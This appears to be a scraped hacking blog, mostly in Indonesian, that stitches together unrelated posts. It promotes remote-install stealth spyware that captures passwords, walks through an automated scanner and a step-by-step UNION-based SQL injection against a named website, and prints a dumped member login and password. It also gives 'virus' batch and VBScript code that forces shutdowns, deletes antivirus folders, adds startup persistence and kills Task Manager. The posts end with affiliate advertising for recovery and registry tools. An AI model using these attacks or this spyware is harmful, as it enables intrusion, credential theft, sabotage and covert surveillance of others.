So, while choosing the best Spy-Software you must look for the above basic features. But unfortunately most of the spy programs on the internet fail to support Remote installation feature. Also they are easily detected by anti-spyware programs and hence they fail to succeed on PCs equipped with anti-spywares.
To make this job simpler for you, I have compiled some of the top Spy softwares on the web. The following Spy softwares support a remote install feature and are also able to counter anti-spywares.

Spy Software to Monitor a Local or Remote PC

SniperSpy allows you to remotely watch your computer like a television! Watch what happens on the screen LIVE! The only remote spy software with a SECURE control panel!
In my experience of more than 6 years, I have tested almost 50 spy softwares. Out of these, one of my favorite spy software is SniperSpy. The following are some of the reasons for which I recommend SniperSpy for you.
1. SniperSpy can be used to monitor your local computer as well as a remote computer. Since it supports remote installation feature, you can install it even on computers for which you do not have physical access.
2. On the whole Internet there exists only a few spy softwares that support remote installation and SniperSpy is the best among them.
3. You can view the LIVE screenshot of the remote computer. Not only screenshots, but also, you can see every activity on the remote comuter LIVE.
4. With SniperSpy you can take a complete control of the remote PC. You can logoff, restart or shutdown the remote PC right from your PC.
5. SniperSpy records every activity of the remote computer.
6. SniperSpy is completely stealth and remains undetected.
7. SniperSpy captures every keystroke that is typed. This includes email passwords, login passwords, instant messenger passwords etc.
8. SniperSpy has the ability to bypass any firewall.
9. SniperSpy is fully compatible with Windows 2000, XP, Vista, 7 and Mac.
Why SniperSpy is the best?
The following features makes SniperSpy stand out from the crowd:
1. Sniper Spy is more reliable than other spy softwares since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.
2. SniperSpy offers excellent customer support.
3. SniperSpy has got recognition from media such as CNN, BBC, CBS, Digit etc. Hence it is more reputed and trustworthy.
For more information on this program and download details visit the following links:

To Monitor a Network of Computers

The following program can be used to monitor an Entire Network of computers from one central location. This becomes handy to monitor the staff in a company or students in a school/college.
You can find a Complete Installation Guide for NetVizor HERE

To Monitor a PC from Cellphone

If you want to monitor your PC using your cellphone, you can use the following software/program.
After reading this post, I hope that you’re aware of the common spy software scams on the Internet. Choose the best spy software to fulfil your needs.
If you want to spy on cell phones refer my new post Cell Phone Spy – How to Spy on Cell Phones

Scaner Web 4 Fun




kali ini sya akan share tentang Tools dalam dunia hacking Website,,,cieee,,,illeeeee,,,,
Sobat semua, ini adalah tools untuk scan website apakah vuln ato tidak ??
soo,,,,,langung aja ane kasih tutor bwt semua tanpa pake lama dechhh,,,,,,,
masukkin url target.. misalnya http://www.target.com di sql injector
trus liat debugging window biar tau si program kerjanya ngapain
(menu settings -> show debug window, ato pencet ctrl+w)
bis itu pencet si tombol go
tunggu....
tunggu...
tunggu...
sampe ntar nongol url yg ada tanda seru dibelakangnya -> [!]
misal
code : http://www.target.com/ind/Read/?type=ixReg&id=590&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htm [!]
nah brarti itu 90% vuln
kamu boleh stop sekarang ato biarin si program nyari sqli bugs yg lain

klo udah stop.
skarang kmu masukkin yg url ada tanda serunya tadi,
jadi yg http://target.com tadi kamu ganti jadi
code : http://www.target.com/ind/Read/?type=ixReg&id=590&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htmtrus pencet go,

biarin dia nyari...
tunggu..
code : [ sqli bugs found ! ]
mssql : Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86)
Mar 3 2007 18:40:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.target.com/ind/Read/?type=ixReg&id=590'/**/AND/**/__TIME__=convert(int,__CODE__)--'&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htm
nah itu dia POC nya nongol sekalian.
yg __TIME__ itu kamu rubah jadi angka berapa aja,
yg __CODE__ itu tempat kodenya (select bla bla from bla bla)

klo nanti ternyata target vuln, tpi gak nongol db, table ato lain2,
kmu coba stop,restart, kasih url yg tanda seru tadi,
contreng di checkbox blind injection, klik go lagi
mungkin si target = blind sqli
udah versi 0.7
Link download :
http://tools.kerinci.net/download/kerinci-0.7.zip
di versi ini kmu tinggal klik aja

Manual SQL Injection


   


Target : http://www.natoleo.com/Content.php?id=14
1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com
muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)

2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')
http://www.natoleo.com/Content.php?id=14 order by 5--
jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)

3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14
http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--
akan muncul "angka ajaib" : 1

4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.
http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--
muncul tulisan :5.0.51a-community

5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--
muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome

6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--
muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id
kita ambil : member_login,member_password

7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL
ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--
hasilnya akan muncul:
user: wilmarnatoleo
pass: natoleoP@ssword
sekarang tinggal login ke website target..

windows Scripting



  • Membuat Virus yang bisa membuat Kompi Restart
Masuk Notepad kemudian isi script di bawah ini :

@echo off
shutdown -r -f -t 00

Perintah ini hanya akan me-restart komputer Anda. Anda aman untuk mencobanya. Sama seperti script virus.bat, script di atas ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat

  • Membuat Virus yang bisa Restart / shutdown Kompi dalam Hitungan Detik
Masuk Notepad kemudian tulis script di bawah ini :

CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60, vbhide

Simpan script tersebut dalam bentuk file.vbs, misal : virusshutdown.vbs. Virus ini berfungsi untuk mematikan windows dalam waktu 60 sekon “shutdown -s-f -t 60"
s = untuk shutdown dan
r = untuk reboot\restart

  • Membuat Virus yang bisa menghapus Folder dalam Kompi
Masuk Notepad kemudian tulis script di bawah ini, agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:

On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” (menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” (menghapus folder antivirus di direktory C:\)

Contoh :
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Kemudian simpan script tersebut dalam bentuk file.vbs, misal: virusdeleted.vbs

  • Menjalankan Virus pada saat Startup Windows
Masuk Notepad kemudian tulis script di bawah ini:

On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs” (menjalankan virus yang berada di direktory c:\windows\system32 dengan nama virus.vbs)

Simpan script tersebut dalam bentuk file.reg, misal : virusstartup.reg

  • Membuat virus pembunuh proses Kompi

Virus ini digunakan untuk membunuh proses (proses adalah program yang sedang berjalan) misalnya kita akan membunuh proses taskmanager. Masuk Notepad kemudian tulis script di bawah ini :
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide

Simpan script tersebut dalam bentuk file.vbs, misal: virustaskkill.vbs

How to Recover Deleted Files from Windows and Mac


How to Recover Deleted Files

 
Recover Deleted Files from Windows and MacHave you accidentally deleted your files from the Hard disk? Do you desperately want to recover them back? Well, you need not panic!
It is possible to recover the deleted files back from the hard disk  (even after you have Shift+Deleted)  provided you act as soon as you realize that the files are deleted and use the best deleted files recovery software.
In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac.
 

How Does the File Recovery Process Works?

 
When you delete a file from your computer, (or even from the recycle bin) the file is not actually deleted. Unlike what most people think, the file is not permanantly deleted or dropped from your hard disk even if you have deleted them from the recycle bin.
Let’s take up a small example of a book containing 50 pages. Suppose when you delete the page 25, assume that only the entry in the index which points to the page 25 is deleted and not actually the page 25 itself. Likewise, when you delete a file from your hard disk, only the pointer which points to this file is removed and not actually the file itself. This file still exists intact and is 100% possible to recover it back in the original condition. In this condition, the file becomes invisible and hence appears to have been deleted.
Recovering the deleted files 100% back in the original condition is very much dependent on the efficiency of the Data Recovery software you use. So, it is necessary to make a right choice when it comes to the selection of file recovery software.  
Today, there exists hundreds of data recovery tools and softwares on the market which boast to recover 100% of all the deleted files back in the original condition. But in reality, most of these softwares are neither effective nor capable of recovering your files back. So, when it comes to Data Recovery, I recommend the following software as the best:
 
1. Stellar Phoenix Data Recovery (for Windows)
2. Stellar Phoenix Mac Data Recovery (for Mac)
 
Stellar Phoenix is one of the best company specializing in deleted files recovery services and solutions since 1993. Stellar’s Data Recovery Solutions encompasses a wide range of software for almost any data loss situation ranging from accidental formats to virus attacks to software malfunctions. Hence Stellar provides the best tools to recover deleted files with over 1,000,000 satisfied customers across 137 countries.
 

What are the Chances of Recovering my Files Back?

 
Since the operating system doesn’t immediately re-use the space from the deleted files, it is most certainly possible to recover the deleted files back in 100% original condition. It may take up a very long time for those files to be completely deleted since the modern hard disks have ample capacity. Hence the chances are too less that the space from the deleted files are re-used immediately.
So, it is really worth to try out the file recovery softwares like Stellar Data Recovery for Windows or Stellar Data Recover for Mac. Some files are reported to have been recovered even after years of it’s deletion. However, for the best results, it is recommended that you use the file recovery software as immediately as possible to recover your deleted files.
 

Recovering the Deleted Files

 
In order to recover the deleted files all you need to do is perform a scan (search) for the deleted files using a File Recovery Software. Please be informed that there is no manual way to recover the deleted files. The Phoenix Data Recovery software performs a thorough scanning of the hard disk sector by sector and will locate the existence of deleted files to restore them back in the original condition. It is the only software that supports 185 popular file types including Windows NT Registry, JPEG, MP4, GIF, BMP and MS Word files. The software offers rich graphical support and incorporates advanced scanning methods to completely scan and recover deleted files from your hard drive. With this recovery software, it is possible to
  • Recover FAT16, FAT32, VFAT, NTFS, and NTFS5 file system partitions
  • Recover deleted emails
  • Recover deleted documents
  • Recover deleted photos
  • Recover deleted music
  • Formatted Hard-Drive recovery
  • Recover files from USB Drives, CDs, DVDs and memory cards
  • Recover almost all the camera format files
Visit the following links for more information on Stellar Data Recovery
 
1. Stellar Phoenix Data Recovery (for Windows)
2. Stellar Phoenix Mac Data Recovery (for Mac)

Sabtu, 16 Juli 2011

How to Repair Registry of Windows PC


Registry Repair Tips
 
Repair Windows RegistryThis article explains how to inspect and repair registry errors in your Windows PC, so as to improve it’s overall performance. If you are a Windows user, then you will most probably be aware of the fact that the Windows registry gets corrupted over time resulting in an overall decreased performance of your computer.
At times, registry errors can also make your PC to freeze down and hang up every now and then causing a serious annoyance to the user. At this point, the registry needs a serious repair to bring your PC back to it’s life. Well, before I tell you how to repair the registry, lets see what causes the registry to get corrupted.
Registry errors may occur due to installing too many applications/softwares from time to time without verifying the publishers. This may create invalid entries in the registry hive leading to errors. With the Internet boom and the era of freeware with free downloads, people often install programs from untrusted sources which results in a serious damage to the registry. Since the registry is a crucial component of the Windows operating system, damage to this registry can cause the system performance to drop down significantly.
 

How to Repair the Registry?

 
The best and the easiest way to repair your registry is by using a Registry Repair Tool (Registry Cleaner). A Registry Cleaner will automatically scan the registry of your PC to find invalid entries and will repair them by removing the errors with in no time. A registry cleaner is the simple and safest solution to repair registry and bring your PC back to it’s life without the need to re-install the Windows.
 

Which Registry Cleaner is the Best?

 
Well, today there exists hundreds of Registry repair tools on the market and as a result, people often get confused at which one to go far. Hence, when it comes to the choice of Registry repair tool, we must be very selective since not all of them are the same.
On the Internet, there exists many such tools which are simply useless and doesn’t apply any significant fixes to the Windows registry. After trying many such useless products on my PC, I finally found one good product which actually made a magic to my PC performance. It is:
 

PC Health Advisor is one of the best and award winning registry cleaner tool that repairs registry to avoid PC errors such as unwanted shutdown, freezing, crashing and more. PC Health Advisor will
  • Repair registry and increases your PC performance by upto 70%
  • Repair registry to fix DLL errors and invalid shortcuts
  • Free up virtual memory to avoid error messages
  • Performs Defragmentation and Compression of the registry
  • Repair registry to fix blue screen errors, system crashes, startup errors and more…
PC Health Advisor is not just a Registry cleaner, rather it is a complete Optimization Toolkit for your PC. Visit PC Health Advisor Homepage for more information on this program.
 

Can I Manually Repair the Registry?

 
Windows registry has a very complex structure with hundreds of thousands of entries embedded in it. A corrupt registry may contain thousands of invalid entries and errors in it and hence it is impractical and almost impossible to manually inspect, find and repair those errors. Also manual registry repair involves serious risk and can lead to a total system breakdown if done improperly. Except you are a highly experienced Windows user or a Windows expert, users are not encouraged to tamper with the registry.
Hence, using a registry repair tool is the safest and easiest way to repair the registry and improve the overall performance of your PC. Registry repair tools will not only repair the registry but also maintains it’s health in a good condition so as to avoid any future damage to it. It is recommended that you periodically (daily or weekly) perform registry scans using these tools to repair the errors as and when they come up so that, you can keep your PC’s health at it’s best. Just repairing the Windows registry can make your PC blazing fast like never before!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More